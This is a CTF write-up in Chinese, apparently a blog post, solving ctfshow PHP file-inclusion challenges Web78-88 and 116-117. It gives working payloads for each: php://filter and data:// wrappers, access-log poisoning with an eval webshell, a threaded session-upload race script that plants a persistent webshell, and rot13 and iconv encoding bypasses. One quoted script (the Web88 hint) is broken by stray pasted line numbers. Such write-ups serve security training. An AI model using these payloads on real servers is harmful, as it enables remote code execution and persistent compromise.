【CTFshow文件包含 Web78-88 & Web116-117】2021.8.28 CTFshow刷题

本文最后更新于:2021年8月29日下午1点08分

Web78

文件包含系列开始

打开题目:

image-20210828133930251

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 10:52:43
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 10:54:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

很明显有一个文件包含

传payload:

1
?file=php://filter/convert.base64-encode/resource=flag.php

得到:

1
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0xNiAxMDo1NToxMQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMTYgMTA6NTU6MjANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3s2MmZhZDNmZC03OGJlLTQ2NDQtYTYxZS0zYTAxNmUyMmZjNDh9Ijs=

解码后得到flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 10:55:11
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 10:55:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


$flag="ctfshow{62fad3fd-78be-4644-a61e-3a016e22fc48}";

官方Hint:

1
?file=php://filter/convert.base64-encode/resource=flag.php

Web79

文件包含系列开始

打开题目:

image-20210828134642691

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:10:14
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 11:12:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

相比上一题多过滤了一个php,将php进行了替换

那就使用data伪协议,payload如下:

1
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

其中base64部分解码后为:

1
<?php system("cat flag.php");?>

image-20210828134945578

官方Hint:

1
2
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');

Web80

文件包含系列开始

打开题目:

image-20210828135104512

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 11:26:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤了phpdata,使用日志文件包含,payload如下:

先设置请求头

1
User-Agent: <?php eval($_POST[1]);?>

然后文件包含:

1
2
?file=/var/log/nginx/access.log
POSTDATA: 1=system('ls');

得到两个文件:fl0g.phpindex.php,访问后得到flag

1
2
?file=/var/log/nginx/access.log
POSTDATA: 1=system('tac fl0g.php');

image-20210828135933730

官方Hint:

1
2
包含日志文件 进行getshell 
日志文件路径: ?file=/var/log/nginx/access.log

Web81

做完这道题,你就已经经历的九九八十一难,是不是感觉很快? 没关系,后面还是九百一十九难,加油吧,少年!

打开题目:

image-20210828140042485

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 15:51:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

和上一题一样,日志包含:

1
2
3
?file=/var/log/nginx/access.log
Header: User-Agent <?php eval($_POST[1]);?>
POSTDATA: 1=system('tac fl0g.php');

官方Hint:

包含日志文件 进行getshell 日志文件路径:

?file=/var/log/nginx/access.log

Web82

文件包含

打开题目:

image-20210828140413299

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 19:34:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

利用PHP_SESSION_UPLOAD_PROGRESS进行条件竞争:

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import io
import requests
import threading

url = "http://5f162c82-f9f8-4db1-a1d2-d33ca949d098.challenge.ctf.show:8080/"
sessid = "lxxx"
data = {
    "1": "file_put_contents('/var/www/html/1.php' , '<?php eval($_POST[2]);?>');"
}

def write(session):
    filebytes = io.BytesIO(b'a'*1024*50)
    while True:
        res = session.post(url ,
            data={
                'PHP_SESSION_UPLOAD_PROGRESS': "<?php eval($_POST[1]);?>"
            },
            cookies={
              'PHPSESSID':sessid
            },
            files={
                'file': ('Lxxx.jpg' , filebytes)
            }
                           )

def read(session):
    while True:
        res = session.post(url+'?file=/tmp/sess_'+sessid , data=data ,
            cookies={
                'PHPSESSID':sessid
            }
            )
        res2 = session.get(url+'1.php')
        if res2.status_code == 200:
            print("OK")
        else:
            print(res2.status_code)

if __name__ == '__main__':
    evnet = threading.Event()
    with requests.session() as session:
        for i in range(5):
            threading.Thread(target=write , args=(session,)).start()
        for i in range(5):
            threading.Thread(target=read , args=(session,)).start()
    evnet.set()

然后访问1.php,POST传参如下得到flag:

1
POSTDATA: 2=system("tac fl0g.php");

官方Hint:

https://www.freebuf.com/vuls/202819.html

这道题有点像wmctf的make php great again 利用session对话进行文件包含利用

https://blog.csdn.net/qq_46091464/article/details/108021053

Web83

继续包含

打开题目:

image-20210828155314942

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 20:28:52
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
session_unset();
session_destroy();

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);

    include($file);
}else{
    highlight_file(__FILE__);
}

虽然销毁了session,但是不影响,还是可以用上一题的exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import io
import requests
import threading

url = "http://932a5cf6-471a-4c87-99f3-7dcb56ab5fa9.challenge.ctf.show:8080/"
sessid = "lxxx"
data = {
    "1": "file_put_contents('/var/www/html/1.php' , '<?php eval($_POST[2]);?>');"
}

def write(session):
    filebytes = io.BytesIO(b'a'*1024*50)
    while True:
        res = session.post(url ,
            data={
                'PHP_SESSION_UPLOAD_PROGRESS': "<?php eval($_POST[1]);?>"
            },
            cookies={
              'PHPSESSID':sessid
            },
            files={
                'file': ('Lxxx.jpg' , filebytes)
            }
                           )

def read(session):
    while True:
        res = session.post(url+'?file=/tmp/sess_'+sessid , data=data ,
            cookies={
                'PHPSESSID':sessid
            }
            )
        res2 = session.get(url+'1.php')
        if res2.status_code == 200:
            print("OK")
        else:
            print(res2.status_code)

if __name__ == '__main__':
    evnet = threading.Event()
    with requests.session() as session:
        for i in range(5):
            threading.Thread(target=write , args=(session,)).start()
        for i in range(5):
            threading.Thread(target=read , args=(session,)).start()
    evnet.set()

访问1.php

1
POSTDATA: 2=system("tac fl0g.php");

官方Hint:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#poc.php
<!DOCTYPE html>
<html>
<body>
<form action="ip地址" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>

Web84

文件包含漏洞

打开题目:

image-20210828160526817

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 20:40:01
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    system("rm -rf /tmp/*");
    include($file);
}else{
    highlight_file(__FILE__);
}

和前两题一样:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import io
import requests
import threading

url = "http://e811bf66-31fb-49a4-9a70-468ef6778161.challenge.ctf.show:8080/"
sessid = "lxxx"
data = {
    "1": "file_put_contents('/var/www/html/1.php' , '<?php eval($_POST[2]);?>');"
}

def write(session):
    filebytes = io.BytesIO(b'a'*1024*50)
    while True:
        res = session.post(url ,
            data={
                'PHP_SESSION_UPLOAD_PROGRESS': "<?php eval($_POST[1]);?>"
            },
            cookies={
              'PHPSESSID':sessid
            },
            files={
                'file': ('Lxxx.jpg' , filebytes)
            }
                           )

def read(session):
    while True:
        res = session.post(url+'?file=/tmp/sess_'+sessid , data=data ,
            cookies={
                'PHPSESSID':sessid
            }
            )
        res2 = session.get(url+'1.php')
        if res2.status_code == 200:
            print("OK")
        else:
            print(res2.status_code)

if __name__ == '__main__':
    evnet = threading.Event()
    with requests.session() as session:
        for i in range(5):
            threading.Thread(target=write , args=(session,)).start()
        for i in range(5):
            threading.Thread(target=read , args=(session,)).start()
    evnet.set()

访问1.php

1
POSTDATA: 2=system("tac fl0g.php");

官方Hint:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#poc.php
<!DOCTYPE html>
<html>
<body>
<form action="ip地址" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>

Web85

继续包含

打开题目:

image-20210828160939085

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 20:59:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    if(file_exists($file)){
        $content = file_get_contents($file);
        if(strpos($content, "<")>0){
            die("error");
        }
        include($file);
    }
    
}else{
    highlight_file(__FILE__);
}

前三题的脚本还是可以用的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import io
import requests
import threading

url = "http://40940aa3-18b4-470c-bacb-115d31c8306b.challenge.ctf.show:8080/"
sessid = "lxxx"
data = {
    "1": "file_put_contents('/var/www/html/1.php' , '<?php eval($_POST[2]);?>');"
}

def write(session):
    filebytes = io.BytesIO(b'a'*1024*50)
    while True:
        res = session.post(url ,
            data={
                'PHP_SESSION_UPLOAD_PROGRESS': "<?php eval($_POST[1]);?>"
            },
            cookies={
              'PHPSESSID':sessid
            },
            files={
                'file': ('Lxxx.jpg' , filebytes)
            }
                           )

def read(session):
    while True:
        res = session.post(url+'?file=/tmp/sess_'+sessid , data=data ,
            cookies={
                'PHPSESSID':sessid
            }
            )
        res2 = session.get(url+'1.php')
        if res2.status_code == 200:
            print("OK")
        else:
            print(res2.status_code)

if __name__ == '__main__':
    evnet = threading.Event()
    with requests.session() as session:
        for i in range(5):
            threading.Thread(target=write , args=(session,)).start()
        for i in range(5):
            threading.Thread(target=read , args=(session,)).start()
    evnet.set()

访问1.php

1
POSTDATA: 2=system("tac fl0g.php");

官方Hint:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#poc.php
<!DOCTYPE html>
<html>
<body>
<form action="ip地址" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>

Web86

继续秀

打开题目:

image-20210828162135301

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 21:20:43
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
define('还要秀?', dirname(__FILE__));
set_include_path(还要秀?);
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);

    
}else{
    highlight_file(__FILE__);
}

还是和前四题一样:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import io
import requests
import threading

url = "http://5233db8a-452f-49f9-9a6b-f90df0de64b6.challenge.ctf.show:8080/"
sessid = "lxxx"
data = {
    "1": "file_put_contents('/var/www/html/1.php' , '<?php eval($_POST[2]);?>');"
}

def write(session):
    filebytes = io.BytesIO(b'a'*1024*50)
    while True:
        res = session.post(url ,
            data={
                'PHP_SESSION_UPLOAD_PROGRESS': "<?php eval($_POST[1]);?>"
            },
            cookies={
              'PHPSESSID':sessid
            },
            files={
                'file': ('Lxxx.jpg' , filebytes)
            }
                           )

def read(session):
    while True:
        res = session.post(url+'?file=/tmp/sess_'+sessid , data=data ,
            cookies={
                'PHPSESSID':sessid
            }
            )
        res2 = session.get(url+'1.php')
        if res2.status_code == 200:
            print("OK")
        else:
            print(res2.status_code)

if __name__ == '__main__':
    evnet = threading.Event()
    with requests.session() as session:
        for i in range(5):
            threading.Thread(target=write , args=(session,)).start()
        for i in range(5):
            threading.Thread(target=read , args=(session,)).start()
    evnet.set()

访问1.php

1
POSTDATA: 2=system("tac fl0g.php");

官方Hint:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#poc.php
<!DOCTYPE html>
<html>
<body>
<form action="ip地址" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>

Web87

继续秀

image-20210828165721683

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 21:57:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);

    
}else{
    highlight_file(__FILE__);
}

利用php伪协议,payload如下:

1
2
?file=%2570%2568%2570%253A%252F%252F%2566%2569%256C%2574%2565%2572%252F%2577%2572%2569%2574%2565%253D%2573%2574%2572%2569%256E%2567%252E%2572%256F%2574%2531%2533%252F%2572%2565%2573%256F%2575%2572%2563%2565%253D%2531%252E%2570%2568%2570
POSTDATA: content=<?cuc flfgrz("gnp s*.cuc");?>

官方Hint:

https://www.leavesongs.com/PENETRATION/php-filter-magic.html

https://xz.aliyun.com/t/8163#toc-3

php://filter/write=string.rot13/resource=2.php

1
%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%33%25%32%65%25%37%30%25%36%38%25%37%30

因为通过base64过滤之后就只有(phpdie)6个字符我们就要添加2个字符让前面的可以进行编码

Web88

继续秀

打开题目:

image-20210828172412672

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-17 02:27:25
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

 */
if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

data协议没有被过滤,但是过滤了等于号,因此在构造base64的时候,稍微凑一下

1
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmw/Py5waHAiKSA7

base64解码后:

1
<?php system("tac fl??.php") ;

官方Hint:

发现过滤的还是比较多,但是没有过滤 : 那我们就可以使用PHP伪协议就是 这里使用的是 data://text/plain;base64,poc 其实和79差不多 只是注意的是编码成base64的时候要去掉 =

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# coding=utf-8
#Author: atao
import io
import requests
import threading
sessID = 'flag'
url = 'http://77f10aa2-a5ca-4ab6-9f42-6e43e5717207.chall.ctf.show/'
def write(session):
    while True:
        f = io.BytesIO(b'a' * 256 * 1) #建议正常这个填充数据大一点
        response = session.post(
        1 2 3 4 5 6 7 8 9
        10
        11
        12
        13url,
        cookies={'PHPSESSID': sessID},
        data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("tac*.php");?>'},
        files={'file': ('a.txt', f)}
        )
def read():
    while True:
        response = session.get(url+'?file=/tmp/sess_{}'.format(sessID))
        if 'flag' in response.text:
            print(response.text)
        	break
session = requests.session()
write = threading.Thread(target=write, args=(session,))
write.daemon = True #当daemon为True时,父线程在运行完毕后,子线程无论是否正在运行,都会伴随主线程一起退出。
write.start()
read()

Web116

misc+lfi

by yu22x

打开题目,有一段视频:

image-20210829120512420

下载这一段视频,下载的时候文件名为index.php

根据前几题经验,直接用file包含源码:

1
2
3
4
5
6
7
8
GET /?file=index.php HTTP/1.1
Host: 1b7b6dd7-ebf6-4446-8012-d5f538e77c89.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

得到源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=isset($_GET['file'])?$_GET['file']:"5.mp4";
filter($file);
header('Content-Type: video/mp4');
header("Content-Length: $file");
readfile($file);
?>

直接包含flag.php

1
2
3
4
5
6
7
8
GET /?file=flag.php HTTP/1.1
Host: 1b7b6dd7-ebf6-4446-8012-d5f538e77c89.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

得到flag:

1
2
3
4
5
6
7
8
9
10
11
12
HTTP/1.1 200 OK
Content-Type: video/mp4
Date: Sun, 29 Aug 2021 04:47:05 GMT
Server: nginx/1.18.0
X-Powered-By: PHP/7.3.22
Content-Length: 63
Connection: close
    
    
<?php
$flag="ctfshow{d1dc5c8d-f560-488c-8591-57fb195a6406}";
?>

官方Hint:

Web117

打开题目:

image-20210829124842965

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php

/*
# -*- coding: utf-8 -*-
# @Author: yu22x
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-01 18:16:59

*/
highlight_file(__FILE__);
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);

web87很像,不过不能使用rot13了,这里就是用UCS-2LEUCS-2BE编码

PHP还有许多其他编码,可以参考链接:PHP: 支持的字符编码 - Manual

1
2
3
4
<?php
$str = "<?php eval(\$_POST[1]);";
echo iconv('UCS-2LE', 'UCS-2BE', $str);
?>

得到结果:

1
?<hp pvela$(P_SO[T]1;)

然后传payload,即可得到flag:

1
2
?file=php://filter/convert.iconv.UCS-2LE.UCS-2BE/resource=1.php
POSTDATA: 1=system("tac flag.php");

官方Hint:

1
2
payload: file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php 
post:contents=?<hp pvela$(P_SO[T]1;)>?